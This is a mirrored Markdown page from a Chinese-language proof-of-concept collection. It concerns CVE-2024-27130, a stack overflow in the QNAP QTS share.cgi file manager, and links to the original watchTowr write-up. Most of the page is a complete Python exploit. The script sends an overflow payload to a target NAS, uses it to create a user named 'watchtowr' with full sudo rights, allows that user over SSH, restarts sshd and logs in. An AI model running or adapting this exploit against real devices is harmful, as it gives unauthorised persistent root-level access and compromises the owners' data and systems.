mirror of
https://github.com/eeeeeeeeee-code/POC.git
synced 2025-07-29 22:14:15 +00:00
69 lines
2.3 KiB
Markdown
69 lines
2.3 KiB
Markdown
|
## QNAP-QTS溢出导致的未授权RCE漏洞(CVE-2024-27130)
|
|||
|
|
|
|||
|
|
share.cgi的No_Support_ACL函数中未修补的堆栈缓冲区溢出漏洞,该漏洞可让攻击者在满足特定先决条件时执行远程代码。
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
## 利用脚本
|
|||
|
|
|
|||
|
|
```python
|
|||
|
|
import argparse
|
|||
|
|
import os
|
|||
|
|
import requests
|
|||
|
|
import urllib3
|
|||
|
|
|
|||
|
|
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
|
|||
|
|
|
|||
|
|
parser = argparse.ArgumentParser(prog='PoC', description='PoC for CVE-2024-27130', usage="Obtain an 'ssid' by requesting a NAS user to share a file to you.")
|
|||
|
|
parser.add_argument('host')
|
|||
|
|
parser.add_argument('ssid')
|
|||
|
|
|
|||
|
|
def main(args):
|
|||
|
|
docmd(args, f"/../../../../usr/local/bin/useradd -p \\"$(openssl passwd -6 {parsedArgs.password})\\" watchtowr #".encode('ascii'))
|
|||
|
|
docmd(args, b"/bin/sed -i -e 's/AllowUsers /AllowUsers watchtowr /' /etc/config/ssh/sshd_config # ")
|
|||
|
|
docmd(args, b"/../../../../bin/echo watchtowr ALL=\\\\(ALL\\\\) ALL >> /usr/etc/sudoers # ")
|
|||
|
|
docmd(args, b"/../../../../usr/bin/killall -SIGHUP sshd # ")
|
|||
|
|
|
|||
|
|
def docmd(args, cmd):
|
|||
|
|
print(f"Doing command '{cmd}'")
|
|||
|
|
buf = cmd
|
|||
|
|
buf = buf + b'A' * (4082 - len(buf))
|
|||
|
|
buf = buf + (0x54140508).to_bytes(4, 'little') # delimiter
|
|||
|
|
buf = buf + (0x54140508).to_bytes(4, 'little') # r0 and r3
|
|||
|
|
buf = buf + (0x54140508).to_bytes(4, 'little') #
|
|||
|
|
buf = buf + (0x54140508).to_bytes(4, 'little') # r7
|
|||
|
|
buf = buf + (0x73af5148).to_bytes(4, 'little') # pc
|
|||
|
|
|
|||
|
|
payload = {
|
|||
|
|
'ssid': args.ssid,
|
|||
|
|
'func': 'get_file_size',
|
|||
|
|
'total': '1',
|
|||
|
|
'path': '/',
|
|||
|
|
'name': buf
|
|||
|
|
}
|
|||
|
|
|
|||
|
|
requests.post(
|
|||
|
|
f"https://{args.host}/cgi-bin/filemanager/share.cgi",
|
|||
|
|
verify=False,
|
|||
|
|
data=payload,
|
|||
|
|
timeout=2
|
|||
|
|
)
|
|||
|
|
|
|||
|
|
def makeRandomString():
|
|||
|
|
chars = "ABCDEFGHJKLMNPQRSTUVWXYZ23456789"
|
|||
|
|
return "".join(chars[c % len(chars)] for c in os.urandom(8))
|
|||
|
|
|
|||
|
|
parsedArgs = parser.parse_args()
|
|||
|
|
parsedArgs.password = makeRandomString()
|
|||
|
|
|
|||
|
|
main(parsedArgs)
|
|||
|
|
print(f"Created new user OK. Log in with password '{parsedArgs.password}' when prompted.")
|
|||
|
|
os.system(f'ssh watchtowr@{parsedArgs.host}')
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
## 漏洞分析
|
|||
|
|
|
|||
|
|
- [QNAP QTS - QNAPping At The Wheel (CVE-2024-27130 and friends) (watchtowr.com)](https://labs.watchtowr.com/qnap-qts-qnapping-at-the-wheel-cve-2024-27130-and-friends/)
|
|||
|
|
- [watchtowrlabs/CVE-2024-27130: PoC for CVE-2024-27130 (github.com)](https://github.com/watchtowrlabs/CVE-2024-27130)
|